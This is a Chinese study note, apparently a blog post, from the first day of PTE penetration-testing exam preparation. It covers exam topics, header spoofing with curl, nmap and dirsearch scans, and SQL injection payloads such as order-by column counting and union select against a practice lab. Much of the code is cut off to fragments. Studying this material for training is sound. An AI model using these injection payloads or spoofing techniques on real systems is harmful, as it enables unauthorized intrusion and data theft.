PTE学习第一天
100
20分理论题目
80分实操题目
20分理论
基础知识的积累
50 + 30
50 小题。5个题目 5个key。
sql注入
文件上传
命令执行
文件包含
cookie
xss
30 综合大题。3个key
综合渗透
web挖掘漏洞 端口渗透
webshell
权限提升
windows提权。sqlserver xp_cmdshell
linux提权 suid
请求包:
1 | GET /challenges |
响应包
1 | 302 FOUND |
平台地址:
It doesn’t come from ‘https://www.secret.com’
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 SomeOne
referer:https://www.secret.com
X-FORWARDED-FOR:127.0.0.1
做到页面提示23333即可
curl hazelshishuaige.club:28001/
–header ‘X-Forwarded-For:127.0.0.1’
–header ‘User-Agent:SniperOJ-Web-Broswer’
–local-port 23333
解题思路:
1 | GET / |
端口
nmap
1 | nmap.exe -sS -p- 123.171.255.158 |
远程桌面
脚本漏洞扫描
1 | ╭─hazel@hazeldeMacBook-Pro ~/Desktop/pte |
目录
御剑
御剑扫描
dirsearch
1 | ╭─hazel@hazeldeMacBook-Pro ~/tool/dirscan/dirsearch-master |
数据库的操作
增删改查
1 | insert |
数据库登陆:
1 | # mysql -uroot -proot -h 127.0.0.1 |
1 |
|
1 | $name = $_GET['username']; # 接收参数的变量 接收get请求的变量 url地址看见请求的参数 |
select查询,同时执行两条sql语句
-
union select 联合查询 – web
两条语句
1 | select * from users where id =1 union select * from users where id =2 |
;
进行分割 – 堆叠注入
1 | ; 可以执行多条sql语句 |
1 | ........... |
1 | SELECT * FROM users WHERE id='$id' LIMIT 0,1 |
1 | mysql> select * from users where username='admin' and 1=1; |
1 | ........... |
判断列数:
1 | mysql> select * from users order by 3; |
如果在数据库中,# 代表注释作用,web #进行url编码%23
1 | http://hazelshishuaige.club:9901/Less-1/?id=1'order by 1%23 |
- version() 查看数据库版本
- user() 数据库⽤户
- database() 当前正在使⽤的数据库名
- @@datadir 数据库路径
- @@version_compile_os 操作系统版本
http://hazelshishuaige.club:9901/Less-1/?id=-1’union select 1,2,database()%23
Flag,key
1 | 1. 数据库名 |
1 | id=1'# |
1 | id=1' order by 1# |